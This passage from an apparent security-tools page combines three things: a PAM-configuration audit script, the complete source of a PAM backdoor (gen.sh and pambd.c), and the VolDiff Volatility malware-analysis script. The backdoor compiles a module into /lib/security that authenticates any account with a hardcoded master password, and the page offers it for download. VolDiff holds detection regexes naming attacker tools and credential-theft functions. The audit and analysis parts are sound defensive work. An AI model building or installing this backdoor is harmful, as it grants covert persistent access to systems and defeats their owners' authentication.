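        case "$type" in auth|account) ;; *) continue ;; esac
        [ "$control" = "sufficient" ] || continue
        case " $KNOWN_MODULES " in
            *" $module "*) ;;
            *) printf '%s %s %s\n' "$type" "$control" "$module" ;;
        esac
    done
}

# Audit every file under a pam.d directory (default /etc/pam.d).
audit_pam_dir() {
    dir="${1:-/etc/pam.d}"
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        find_unknown_sufficient < "$f" | sed "s|^|$f: |"
    done
}

# Report module files in the usual PAM directories that no package owns;
# a hand-built .so copied there is exactly what this surfaces.
unowned_pam_modules() {
    for f in /lib/security/*.so /lib/*/security/*.so /usr/lib/*/security/*.so /lib64/security/*.so; do
        [ -f "$f" ] || continue
        if command -v dpkg >/dev/null 2>&1; then
            dpkg -S "$f" >/dev/null 2>&1 || echo "unowned: $f"
        elif command -v rpm >/dev/null 2>&1; then
            rpm -qf "$f" >/dev/null 2>&1 || echo "unowned: $f"
        fi
    done
}

echo "Suspicious entries in the constructed sample:"
printf '%s\n' "$SAMPLE_PAM_CONFIG" | find_unknown_sufficient

if [ "${1:-}" = "--live" ]; then
    echo "Auditing /etc/pam.d and module ownership on this host:"
    audit_pam_dir
    unowned_pam_modules
fi
```

On the sample, the two `pambd.so` lines are reported and the stock `pam_rootok.so`/`pam_unix.so` lines are not; `session`-type lines are ignored because they cannot grant authentication. A module that is `required` rather than `sufficient` is not flagged by the first check, which is why the ownership check is worth running alongside it.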

gen.sh – generate the pam backdoor. Script:

#!/bin/bash
# gen.sh - generate the pam backdoor.

BIN_GCC='/usr/bin/gcc'
BIN_LD='/usr/bin/ld'
BIN_RM='/bin/rm'

CFLAGS='-fPIC'
LDFLAGS='-x --shared'

if [ "$(id -u)" != '0' ]; then
    echo 'This script must be run as root!' 1>&2
    exit 1
fi

${BIN_GCC} ${CFLAGS} -c pambd.c
${BIN_LD} ${LDFLAGS} -o /lib/security/pam_bd.so pambd.o
${BIN_RM} pambd.o

pambd.c – A small pam backdoor. Script:

/**
 * pambd.c - A small pam backdoor.
 * Federico Fazzi <eurialo@deftcode.ninja>
 * 
 * This trick shows you how to create a PAM module backdoor that 
 * allows to execute an user login with your own custom password.
 *
 * If you try to make the login with the real password of the target 
 * user and the authentication fails, the pam_auth.so switches to the 
 * pambd.so and viceversa!
 *
 * (c) 2015 - MIT License.
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <security/pam_appl.h>
#include <security/pam_modules.h>

#define MYPASSWD "my_master_passwd"

PAM_EXTERN int pam_sm_setcred
(pam_handle_t *pamh, int flags, int argc, const char **argv) {
    return PAM_SUCCESS;
}

PAM_EXTERN int pam_sm_acct_mgmt
(pam_handle_t *pamh, int flags, int argc, const char **argv) {
    return PAM_SUCCESS;
}

PAM_EXTERN int pam_sm_authenticate
(pam_handle_t *pamh, int flags,int argc, const char **argv) {
    char *password = NULL;

    pam_get_authtok(pamh, PAM_AUTHTOK, (const char **)&password, NULL);

    if (!strncmp(password, MYPASSWD, strlen(MYPASSWD)))
        return PAM_SUCCESS;

    return -1;
}

Download : Master.zip  | Clone Url
Source : https://github.com/eurialo


Updates VolDiff – Malware Memory Footprint Analysis.


Latest Version v-1.2:
+ Added checks to search for executables/DLLs loaded from TEMP folders
+ Added checks to search for keylogger artifacts
+ Added a check to dump and analyse the hosts file
+ Added a routine to compute a list of unique IPs from netscan output
+ Minor bug fixes and enhancements

VolDiff is a bash script that runs Volatility plugins against memory images captured before and after malware execution. It creates a report that highlights system changes.

VolDiff is a simple yet powerful malware analysis tool that enables malware analysts to quickly identify IOCs and understand advanced malware behaviour.

Use Directions:
1. Capture a memory dump of a clean Windows system and save it as “baseline.raw”. This image will serve as a baseline for the analysis.
2. Execute your malware sample on the same system, then take a second memory dump and save it as “infected.raw”.
3. Run VolDiff:

./VolDiff.sh path/to/baseline.raw path/to/infected.raw profile
"profile" should be "Win7SP0x86" or "Win7SP1x64" etc.

VolDiff will save the output of a selection of Volatility plugins for both memory images (baseline and infected), then it will create a report to highlight notable changes (new processes, network connections, injected code, drivers etc).
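The report is built from three small text filters: keep the lines of each plugin's infected-image output that the baseline output lacks (diff, keep the `>` lines, strip the marker), reduce the new netscan lines to a unique IP list, and flag any process named System whose PID is not 4. The block below is an added shell example for this page, not VolDiff's own code; it runs those filters over constructed netscan and psscan output laid out like the sample report, so they can be exercised without Volatility. One deliberate refinement over VolDiff's "grep every IP" approach is noted in the comments: only the Foreign Address column is taken, so the host's own address does not end up in the IoC list.

```shell
#!/bin/sh
# voldiff_filters.sh: the baseline/infected comparison behind VolDiff's report,
# as an added example over constructed plugin output (not VolDiff code).

# Constructed netscan output in the layout of the post's sample report.
BASELINE_NETSCAN='Proto    Local Address                  Foreign Address      State            Pid      Owner
TCPv4    172.16.108.128:139             0.0.0.0:0            LISTENING        4        System
TCPv4    172.16.108.128:49164           65.55.50.157:443     CLOSED           924      svchost.exe'

INFECTED_NETSCAN='Proto    Local Address                  Foreign Address      State            Pid      Owner
TCPv4    172.16.108.128:139             0.0.0.0:0            LISTENING        4        System
TCPv4    172.16.108.128:49164           65.55.50.157:443     CLOSED           924      svchost.exe
TCPv4    172.16.108.128:49167           62.24.131.168:80     CLOSED           924      svchost.exe
TCPv4    127.0.0.1:49170                127.0.0.1:8080       ESTABLISHED      2300     kmaxqsj.exe
TCPv4    172.16.108.128:49168           87.236.215.151:80    CLOSED           2108     explorer.exe'

# Constructed psscan output with a second process that merely calls itself "System".
PSSCAN_INFECTED='Offset(P)          Name                PID   PPID PDB        Time created
------------------ ---------------- ------ ------ ---------- ------------------------------
0x000000003fc7f030 System                4      0 0x00185000 2015-05-02 19:20:01 UTC+0000
0x000000003fc8ed40 System             2908   4020 0x3ebed540 2015-05-02 19:32:45 UTC+0000'

# 1. Lines present in the infected output but absent from the baseline: the same
#    recipe VolDiff uses (diff, keep '>' lines, strip the two-character marker).
new_lines() {   # $1 = baseline text, $2 = infected text
    b=$(mktemp) || return 1
    i=$(mktemp) || return 1
    printf '%s\n' "$1" > "$b"
    printf '%s\n' "$2" > "$i"
    diff "$b" "$i" | grep -E '^>' | sed 's/^..//' || true
    rm -f "$b" "$i"
}

# 2. Unique foreign IPv4 addresses from netscan lines on stdin. VolDiff greps
#    every dotted quad out of each line; this takes only the Foreign Address
#    column (so the local address stays out) and drops 0.0.0.0 and loopback.
foreign_ips() {
    awk '$1 ~ /^(TCP|UDP)v4$/ { split($3, a, ":"); print a[1] }' \
        | sort -u | grep -v -E '^(0\.0\.0\.0|127\.0\.0\.1)$' || true
}

# 3. The rule "the real System process has PID 4": print the PID of every other
#    psscan entry carrying that name.
bogus_system_pids() {
    awk '$2 == "System" && $3 != 4 { print $3 }'
}

echo "New connections:"
new_lines "$BASELINE_NETSCAN" "$INFECTED_NETSCAN"
echo "Unique foreign IPs from the new connections:"
new_lines "$BASELINE_NETSCAN" "$INFECTED_NETSCAN" | foreign_ips
echo "Processes named System with a PID other than 4:"
printf '%s\n' "$PSSCAN_INFECTED" | bogus_system_pids
```

Because `diff` is line-based, a connection whose state changed between the two captures (CLOSED to ESTABLISHED, say) also shows up as "new"; that is intended here, since a changed row is as interesting to the analyst as an added one.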

Example Output:

Volatility analysis report generated by VolDiff.
Download the latest VolDiff version from https://github.com/aim4r/VolDiff/.

Suspicious new connections (netscan)
=========================================================================

Proto    Local Address                  Foreign Address      State            Pid      Owner 
TCPv4    172.16.108.128:139             0.0.0.0:0            LISTENING        4        System 
TCPv4    172.16.108.128:49167           62.24.131.168:80     CLOSED           924      svchost.exe 
TCPv4    172.16.108.128:49164           65.55.50.157:443     CLOSED           924      svchost.exe 
TCPv4    172.16.108.128:49165           62.24.131.168:80     CLOSED           924      svchost.exe 
TCPv4    172.16.108.128:49168           87.236.215.151:80    CLOSED           2108     explorer.exe

Suspicious new processes (psscan)
=========================================================================

Offset(P)          Name                PID   PPID PDB        Time created                    
------------------ ---------------- ------ ------ ---------- ------------------------------ 
0x000000003fc7f030 kmaxqsj.exe        2300   4044 0x3ebed520 2015-05-02 19:33:07 UTC+0000  
0x000000003fc8ed40 malwr.exe          2908   4020 0x3ebed540 2015-05-02 19:32:45 UTC+0000  

Potential process injection (malfind)
=========================================================================

Process: kmaxqsj.exe Pid: 2300 Address: 0x400000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 165, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x00400000  4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00   MZ..............
0x00400010  b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00   ........@.......
0x00400020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x00400030  00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00   ................

0x400000 4d               DEC EBP
0x400001 5a               POP EDX
0x400002 90               NOP
0x400003 0003             ADD [EBX], AL
0x400005 0000             ADD [EAX], AL
0x400007 000400           ADD [EAX+EAX], AL
0x40000a 0000             ADD [EAX], AL
0x40000c ff               DB 0xff

Suspicious driver modules
===========================================================================

Module                               Driver
------------------------------------ ------
UNKNOWN                              \Driver\storage
UNKNOWN                              \Driver\PGPsdkDriver
UNKNOWN                              \Driver\cipher
UNKNOWN                              \Driver\fileflt
UNKNOWN                              \Driver\TdiFlt2
UNKNOWN                              \Driver\TdiFlt
UNKNOWN                              \Driver\stopsec

Suspicious callbacks
===========================================================================

Type                                 Callback   Module   
------------------------------------ ---------- --------
IoRegisterFsRegistrationChange       0x8549dd08 UNKNOWN  
GenericKernelCallback                0x854a0c88 UNKNOWN  
GenericKernelCallback                0x854964ec UNKNOWN 
GenericKernelCallback                0x854a0d88 UNKNOWN 
GenericKernelCallback                0x854961fa UNKNOWN 
IoRegisterShutdownNotification       0x854a28ca UNKNOWN

Script:

#!/bin/bash
# VolDiff malware analysis script by @aim4r

version="1.2.0"

################################ PRINT VOLDIFF BANNER ################################
echo -e " _    __      ______  _ ________"
echo -e "| |  / /___  / / __ \(_) __/ __/"
echo -e "| | / / __ \/ / / / / / /_/ /_  "
echo -e "| |/ / /_/ / / /_/ / / __/ __/  "
echo -e "|___/\____/_/_____/_/_/ /_/     "

echo -e "\nVolDiff: Malware Memory Footprint Analysis (v$version)"

################################ HELP ################################
if [[ $@ =~ "--help" ]] ; then
  echo -e "\nUsage: ./VolDiff.sh [BASELINE_IMAGE] INFECTED_IMAGE PROFILE [OPTIONS]"
  echo -e "\nUse directions:"
  echo -e "1. Capture a memory dump of a clean Windows system and save it as \"baseline.raw\". This image will serve as a baseline for the analysis."
  echo -e "2. Execute your malware sample on the same system, then capture a second memory dump and save it as \"infected.raw\"."
  echo -e "3. Run VolDiff as follows: \"./VolDiff.sh baseline.raw infected.raw <profile>\" where <profile> is Win7SP0x86 or Win7SP1x64 etc."
  echo -e "VolDiff will save the output of a selection of volatility plugins for both memory images (baseline and infected), then it will create a report to highlight notable changes (new processes, network connections, injected code, suspicious drivers etc)."
  echo -e "\nVolDiff can also be used to analyse a single memory image."
  echo -e "\nOptions:"
  echo -e "--help            display this help and exit"
  echo -e "--version         display version information and exit"
  echo -e "--dependencies    display information about script dependencies and exit"
  echo -e "--malware-checks  hunt and report suspicious anomalies (slow, recommended)"
  echo -e "--no-report       do not create a report"
  echo -e "\nTested using Volatility 2.4 (vol.py) on Windows 7 images."
  echo -e "Report bugs to houcem.hachicha[@]gmail.com"
  exit
fi

################################ VERSION INFORMATION ################################
if [[ $@ =~ "--version" ]] ; then
  echo -e "This is free software: you are free to change and redistribute it."
  echo -e "There is NO WARRANTY, to the extent permitted by law."
  echo -e "Written by @aim4r. Report bugs to houcem.hachicha[@]gmail.com."
  exit
fi

################################ DEPENDENCIES ################################
if [[ $@ =~ "--dependencies" ]] ; then
  echo -e "Requires volatility 2.4 (vol.py) to be installed."
  exit
fi

################################ DECLARING LIST OF VOLATILITY PLUGINS TO PROCESS ################################
# volatility plugins to run:
# note: the Volatility plugin is spelled "shellbags"
declare -a plugins_to_run=("handles" "psxview" "netscan" "iehistory" "getsids" "pslist" "psscan" "cmdline" "consoles" "dlllist" "filescan" "shimcache" "shellbags" "sessions" "messagehooks" "eventhooks" "svcscan" "envars" "mutantscan" "symlinkscan" "atoms" "atomscan" "drivermodule" "mftparser" "driverscan" "devicetree" "modules" "modscan" "unloadedmodules" "callbacks" "ldrmodules" "privs" "hashdump" "orphanthreads" "malfind" "idt" "gdt" "driverirp" "deskscan" "timers" "gditimers" "ssdt")

# volatility plugins to report on (order matters!) / dual mode:
declare -a plugins_to_report=("pslist" "psscan" "psxview" "netscan" "iehistory" "malfind" "sessions" "privs" "messagehooks" "eventhooks" "envars" "shimcache" "shellbags" "cmdline" "consoles" "hashdump" "drivermodule" "driverscan" "driverirp" "modules" "modscan" "unloadedmodules" "devicetree" "callbacks" "orphanthreads" "mutantscan" "symlinkscan" "ssdt")

# volatility plugins to report on (order matters!) / standalone mode:
declare -a plugins_to_report_standalone=("netscan" "psscan" "psxview" "malfind" "cmdline" "consoles" "iehistory")

################################ HARDCODED REGEX EXPRESSIONS ################################
hacker_process_regex="at.exe|chtask.exe|clearev|ftp.exe|net.exe|nbtstat.exe|net1.exe|ping.exe|powershell|procdump.exe|psexec|quser.exe|reg.exe|regsvr32.exe|schtasks|systeminfo.exe|taskkill.exe|timestomp|winrm|wmic|xcopy.exe"
hacker_dll_regex="mimilib.dll|sekurlsa.dll|wceaux.dll|iamdll.dll"

# suspicious process names
l33t_process_name="snss|crss|cssrs|csrsss|lass|isass|lssass|lsasss|scvh|svch0st|svhos|svchst|svchosts|lsn|g0n|l0g|nvcpl|rundii|wauclt|spscv|spppsvc|sppscv|sppcsv|taskchost|tskhost|msorsv|corsw|arch1ndex|wmipvr|wmiprse|runddl"

# usual process list (csrss.exe is the genuine Windows process; "crss" in the list above is a look-alike name)
usual_processes="sppsvc.exe|audiodg.exe|mscorsvw.exe|SearchIndexer|TPAutoConnSvc|TPAutoConnect|taskhost.exe|smss.exe|csrss.exe|wininit.exe|services.exe|lsass.exe|svchost.exe|lsm.exe|explorer.exe|winlogon|conhost.exe|dllhost.exe|spoolsv.exe|vmtoolsd.exe|WmiPrvSE.exe"

# regexes used to analyse imports
password_extract_imports="SamLookupDomainInSamServer|NlpGetPrimaryCredential|LsaEnumerateLogonSessions|SamOpenDomain|SamOpenUser|SamGetPrivateData|SamConnect|SamRidToSid|PowerCreateRequest|SeDebugPrivilege|SystemFunction006|SystemFunction040"
process_injection_imports="VirtualAllocEx|AllocateVirtualMemory|VirtualProtectEx|ProtectVirtualMemory|CreateProcess|LoadLibrary|LdrLoadDll|CreateToolhelp32Snapshot|QuerySystemInformation|EnumProcesses|WriteProcessMemory|WriteVirtualMemory|CreateRemoteThread|ResumeThread|SetThreadContext|SetContextThread|QueueUserAPC|QueueApcThread|WinExec"
web_imports="DeleteUrlCacheEntry|CreateUrlCacheEntry|HttpSendRequestA|HttpSendRequestW|HttpSendRequestExA|HttpSendRequestExW|URLDownloadToFileA|WSASocket|WSASend|WSARecv|WS2_32"
service_imports="CreateService|StartService|NdrClientCall2|NtLoadDriver"
uac_bypass_imports="AllocateAndInitializeSid|EqualSid|RtlQueryElevationFlags|GetTokenInformation|GetSidSubAuthority|GetSidSubAuthorityCount"
anti_debug_imports="CheckRemoteDebugger|DebugActiveProcess|FindWindow|GetLastError|GetWindowThreadProcessId|IsDebugged|IsDebuggerPresent|NtCreateThreadEx|NtGlobalFlags|NtSetInformationThread|OutputDebugString|pbIsPresent|Process32First|Process32Next|TerminateProcess|ThreadHideFromDebugger|UnhandledExceptionFilter|ZwQueryInformation"
misc_imports="CreateFile|NtSetSystemInformation|NtQuerySystemInformation|GetCurrentProcess|GetStartupInfo|GlobalAddAtomA|Sleep|RegOpenKeyEx|RegQueryValueEx|GetModuleFileName|WriteFile"

# regexes used to analyse strings (from process executables)
web_regex_str="cookie|download|mozilla|post|proxy|responsetext|socket|useragent|user-agent|urlmon|user_agent|WebClient|winhttp|http"
antivirus_regex_str="antivir|avast|avcons|avgctrl|avginternet|avira|bitdefender|checkpoint|comodo|F-Secure|firewall|kaspersky|mcafee|norton|norman|safeweb|sophos|symantec|windefend"
virtualisation_regex_str="000569|001C14|080027|citrix|parallels|proxmox|qemu|SbieDll|Vbox|VMXh|virm|virtualbox|virtualpc|vmsrvc|vpc|winice|vmware|xen"
sandbox_regex_str="anubis|capturebat|cuckoo|deepfreeze|debug|fiddler|fireeye|noriben|perl|python|sandb|schmidti|snort|tcpdump|wireshark"
sysinternals_regex_str="filemon|sysinternal|procmon|psexec|regmon|sysmon"
shell_regex_str="shellexecute|shell32"
keylogger_regex_str="backspace|klog|keylog|shift"
filepath_regex_str='C:\\(?:[^\\/:*?"<>|\r\n]+\\)*[^\\/:*?"<>|\r\n]*'
password_regex_str="brute|credential|creds|mimikatz|passwd|password|pwd|sniff|stdapi|WCEServicePipe|wce_krbtkts"
powershell_regex_str="powerview|powershell"
infogathering_regex_str="gethost|wmic|GetVolumeInformation"
banking_regex_str="banc|banco|bank|Barclays|hsbc|jpmorgan|lloyds|natwest|paypal|santander"
socialsites_regex_str="facebook|instagram|linkedin|twitter|yahoo|youtube"
exec_regex_str="\.bat|\.cmd|\.class|\.exe|\.jar|\.js|\.jse|\.SCR|\.VBE|\.vbs"
crypto_regex_str="bitlocker|crypt|truecrypt|veracrypt"
other_regex_str="admin|backdoor|botnet|chrome|clearev|currentversion|firefox|hosts|login|malware|netsh|registry|rootkit|sleep|smtp|timestomp|torrent|Trojan|UserInit"

################################ RUNNING MODE ################################
if [[ -f $2 ]] ; then
  mode="dual"
else
  mode="standalone"
fi

################################################################## ENTER DUAL MODE ################################################################## 

################################ SETTING PROFILE AND FINDING PATH TO MEMORY IMAGES ################################
if [[ $mode = "dual" ]] ; then 
  if [[ -f $1 ]] ; then
    baseline_memory_image=$1
    echo -e "Path to baseline memory image: $baseline_memory_image..."
  elif [[ -f baseline.raw ]] ; then
    baseline_memory_image=baseline.raw
    echo -e "Path to baseline memory image is not valid or was not specified. Using default ($baseline_memory_image)..."
  elif [[ -f baseline.vmem ]] ; then
    baseline_memory_image=baseline.vmem
    echo -e "Path to baseline memory image is not valid or was not specified. Using default ($baseline_memory_image)..."
  else
    echo -e "Please specify a path to a baseline memory image."
    exit
  fi

  if [[ -f $2 ]]; then
    infected_memory_image=$2
    echo -e "Path to infected memory image: $infected_memory_image..."
  elif [[ -f infected.raw ]] ; then
    infected_memory_image=infected.raw
    echo -e "Path to infected memory image is not valid or was not specified. Using default ($infected_memory_image)..."
  elif [[ -f infected.vmem ]] ; then
    infected_memory_image=infected.vmem
    echo -e "Path to infected memory image is not valid or was not specified. Using default ($infected_memory_image)..."
  else
    echo -e "Please specify a path to a memory image of an infected system."
    exit
  fi

  if [[ -z $3 ]] ; then
    profile=Win7SP0x86
    echo -e "Profile is not specified. Using default ($profile)..."
  elif [[ $3 != Win7SP1x64 ]] &&  [[ $3 != Win7SP0x86 ]] &&  [[ $3 != Win7SP0x64 ]] &&  [[ $3 != Win7SP1x86 ]] ; then
    profile=$3
    echo -e "WARNING: This script was only tested using Windows 7 profiles. The specified profile ($profile) seems different!" 
  else
    profile=$3
    echo -e "Profile: $profile..."
  fi

  ################################ CREATING FOLDER TO STORE OUTPUT ################################
  starttime=$(date +%s)
  output_dir=VolDiff_$(date +%F_%R)
  mkdir $output_dir
  mkdir $output_dir/tmpfolder

  ################################ RUNNING VOLATILITY PLUGINS ################################
  echo -e "Running a selection of volatility plugins (time consuming)..."
  for plugin in "${plugins_to_run[@]}"   # "$" is required to expand the array; without it the loop runs once over the literal string
  do
    echo -e "Volatility plugin "$plugin" execution in progress..."
    mkdir $output_dir/$plugin
    if [[ $plugin = "mutantscan" ]] || [[ $plugin = "handles" ]] || [[ $plugin = "privs" ]]  || [[ $plugin = "envars" ]] ; then
      vol.py --profile=$profile -f $baseline_memory_image $plugin --silent &> $output_dir/$plugin/baseline-$plugin.txt &
      vol.py --profile=$profile -f $infected_memory_image $plugin --silent &> $output_dir/$plugin/infected-$plugin.txt &
      wait
    elif [[ $plugin = "orphanthreads" ]]  ; then
      vol.py --profile=$profile -f $baseline_memory_image threads -F OrphanThread &> $output_dir/orphanthreads/baseline-orphanthreads.txt &
      vol.py --profile=$profile -f $infected_memory_image threads -F OrphanThread &> $output_dir/orphanthreads/infected-orphanthreads.txt &
      wait
    elif [[ $plugin = "psxview" ]]  ; then
      vol.py --profile=$profile -f $baseline_memory_image psxview -R &> $output_dir/psxview/baseline-psxview.txt &
      vol.py --profile=$profile -f $infected_memory_image psxview -R &> $output_dir/psxview/infected-psxview.txt &
      wait
    elif [[ $plugin = "malfind" ]] ; then
      mkdir $output_dir/$plugin/dump-dir-baseline
      mkdir $output_dir/$plugin/dump-dir-infected
      vol.py --profile=$profile -f $baseline_memory_image $plugin -D $output_dir/$plugin/dump-dir-baseline &> $output_dir/$plugin/baseline-$plugin.txt &
      vol.py --profile=$profile -f $infected_memory_image $plugin -D $output_dir/$plugin/dump-dir-infected &> $output_dir/$plugin/infected-$plugin.txt &
      wait
    else
      vol.py --profile=$profile -f $baseline_memory_image $plugin &> $output_dir/$plugin/baseline-$plugin.txt &
      vol.py --profile=$profile -f $infected_memory_image $plugin &> $output_dir/$plugin/infected-$plugin.txt &
      wait
    fi
  done
  wait

  ################################ DIFFING VOLATILITY RESULTS ################################
  echo -e "Diffing output results..."
  for plugin in "${plugins_to_run[@]}"
  do
    diff $output_dir/$plugin/baseline-$plugin.txt $output_dir/$plugin/infected-$plugin.txt | grep -E "^>" | sed 's/^..//' &> $output_dir/$plugin/diff-$plugin.txt
  done

  ################################ DUMPING NEW PROCESSES TO DISK ################################
  echo -e "Dumping new processes to disk..."
  cat $output_dir/psscan/diff-psscan.txt | tr -s ' ' | cut -d " " -f 3 | sort | uniq >  $output_dir/tmpfolder/new-procpids.tmp
  mkdir $output_dir/procdump
  while read newpid ; do
    vol.py --profile=$profile -f $infected_memory_image procdump -D $output_dir/procdump/ -p $newpid &> /dev/null
  done < $output_dir/tmpfolder/new-procpids.tmp
  wait


  if [[ $@ =~ "--malware-checks" ]] ; then
    touch $output_dir/tmpfolder/malware-checks.tmp
    echo -e "Hunting for process anomalies..."

    ################################ MALWARE CHECKS - NETWORK ################################

    # compute unique IPs from netscan output:
    cat $output_dir/netscan/diff-netscan.txt | grep -o -E "([0-9]{1,3}[\.]){3}[0-9]{1,3}" | sort | uniq | grep -v -E "127\.0\.0\.1|0\.0\.0\.0" > $output_dir/tmpfolder/netscan-uniq-ips.tmp
    if [[ -s $output_dir/tmpfolder/netscan-uniq-ips.tmp ]]; then
      echo -e "\n\nUnique IP addresses from netscan output." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/netscan-uniq-ips.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    ################################ MALWARE CHECKS - PROCESS ANOMALIES ################################

    # verify PID of System process = 4
    cat $output_dir/psscan/infected-psscan.txt | grep " System " | tr -s ' ' | cut -d " " -f 3 > $output_dir/tmpfolder/system-pids.tmp
    while read pid; do
      if [[ $pid != "4" ]] ; then
        echo -e "\nSuspicious 'System' process running with PID $pid (expected PID is 4)." >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    done < $output_dir/tmpfolder/system-pids.tmp

    # verify that only one instance of certain processes is running:
    for process in " services.exe" " System" " wininit.exe" " smss.exe" " lsass.exe" " lsm.exe" " explorer.exe"; do
      if [[ "$(cat $output_dir/psscan/infected-psscan.txt | grep $process | wc -l)" != "1" ]] ; then
        echo -e "\n\nMultiple instances of$process were detected." >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
        sed -n '2p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
        sed -n '3p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
        cat $output_dir/psscan/infected-psscan.txt | grep $process >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    done

    # verify that some processes do not have a child:
    for process in "lsass.exe" "lsm.exe"; do
      cat $output_dir/psscan/infected-psscan.txt | grep $process | tr -s ' ' | cut -d " " -f 3 >> $output_dir/tmpfolder/cpids.tmp
    done
    cat $output_dir/psscan/infected-psscan.txt | tr -s ' ' | cut -d " " -f 4 >> $output_dir/tmpfolder/ppids.tmp
    while read pid; do
      while read ppid; do
        if [[ "$pid" == "$ppid" ]]; then
          echo -e "\n\nProcess with (PID $ppid) is not supposed to be a parent." >> $output_dir/tmpfolder/malware-checks.tmp
          echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
          sed -n '2p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
          sed -n '3p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
          cat $output_dir/psscan/infected-psscan.txt | grep " $ppid " >> $output_dir/tmpfolder/malware-checks.tmp
        fi
      done < $output_dir/tmpfolder/ppids.tmp
    done < $output_dir/tmpfolder/cpids.tmp

    # verify child/parent process relationships:
    for child in " svchost.exe" " smss.exe" " conhost.exe" " audiodg.exe" " services.exe" " lsass.exe" " lsm.exe" " taskhost.exe" " spoolsv.exe" " sppsvc.exe" " mscorsvw.exe" " TPAutoConnSvc" " SearchIndexer" " WmiPrvSE.exe" ; do
      if [[ $child = " sppsvc.exe" ]] || [[ $child = " taskhost.exe" ]] || [[ $child = " mscorsvw.exe" ]] || [[ $child = " TPAutoConnSvc" ]] || [[ $child = " SearchIndexer" ]] || [[ $child = " svchost.exe" ]] || [[ $child = " spoolsv.exe" ]] ; then parent=" services.exe"; fi
      if [[ $child = " smss.exe" ]]; then parent=" System"; fi
      if [[ $child = " conhost.exe" ]]; then parent=" csrss.exe"; fi
      if [[ $child = " WmiPrvSE.exe" ]] || [[ $child = " audiodg.exe" ]] ; then parent=" svchost.exe"; fi
      if [[ $child = " services.exe" ]] || [[ $child = " lsass.exe" ]] || [[ $child = " lsm.exe" ]]; then parent=" wininit.exe"; fi
      if grep $child $output_dir/psscan/infected-psscan.txt > /dev/null ; then
        if [[ "$(cat $output_dir/psscan/infected-psscan.txt | grep $parent | wc -l)" = "1" ]] ; then
          cat $output_dir/psscan/infected-psscan.txt | grep $child | tr -s ' ' | cut -d " " -f 4 > $output_dir/tmpfolder/child-ppids.tmp
          parent_pid="$(cat $output_dir/psscan/infected-psscan.txt | grep $parent | tr -s ' ' | cut -d ' ' -f 3)"
          while read ppid; do
            ppid=$( printf $ppid )
            parent_pid=$( printf $parent_pid )
            if [[ $ppid != $parent_pid ]] ; then
              tail -n +4 $output_dir/psscan/infected-psscan.txt | tr -s ' ' | cut -d ' ' -f 2-3 | grep -i " "$ppid | cut -d ' ' -f 1 | sort | uniq > $output_dir/tmpfolder/ppidprocess.tmp
              if [[ -s $output_dir/tmpfolder/ppidprocess.tmp ]] ; then   
                ppidlines=$(wc -l < $output_dir/tmpfolder/ppidprocess.tmp)
                if [[ $ppidlines = 1 ]] ; then
                  echo -e "\n\nUnexpected parent process for$child: PPID $ppid (`cat $output_dir/tmpfolder/ppidprocess.tmp`) instead of PPID $parent_pid ($parent )." >> $output_dir/tmpfolder/malware-checks.tmp
                  echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
                  sed -n '2p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
                  sed -n '3p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
                  cat $output_dir/psscan/infected-psscan.txt | grep " $ppid " >> $output_dir/tmpfolder/malware-checks.tmp
                else
                  cat $output_dir/tmpfolder/ppidprocess.tmp | tr '\n' ' ' > $output_dir/tmpfolder/ppparents.tmp
                  echo -e "\n\nUnexpected parent process for$child: PPID $ppid ( multiple associated processes: `cat $output_dir/tmpfolder/ppparents.tmp`) instead of PPID $parent_pid ($parent )." >> $output_dir/tmpfolder/malware-checks.tmp
                  echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
                  sed -n '2p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
                  sed -n '3p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
                  cat $output_dir/psscan/infected-psscan.txt | grep " $ppid " >> $output_dir/tmpfolder/malware-checks.tmp
                fi
              else
                echo -e "\n\nUnexpected parent process for$child: PPID $ppid (could not map associated process name) instead of PPID $parent_pid ($parent )." >> $output_dir/tmpfolder/malware-checks.tmp
                echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
                sed -n '2p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
                sed -n '3p' $output_dir/psscan/infected-psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
                cat $output_dir/psscan/infected-psscan.txt | grep " $ppid " >> $output_dir/tmpfolder/malware-checks.tmp
              fi
            fi     
          done < $output_dir/tmpfolder/child-ppids.tmp
        fi
      fi
    done

    # verify that every process has a parent (except for explorer.exe, csrss.exe, wininit.exe and winlogon.exe)
    mkdir $output_dir/tmpfolder/ppids
    tail -n +4 $output_dir/psscan/infected-psscan.txt | tr -s ' ' | cut -d ' ' -f 4 | sort | uniq | grep -v "^0$" > $output_dir/tmpfolder/ppids/ppids.temp
    tail -n +4 $output_dir/psscan/infected-psscan.txt | tr -s ' ' | cut -d ' ' -f 3 | sort | uniq > $output_dir/tmpfolder/ppids/pids.temp
    while read ppid; do 
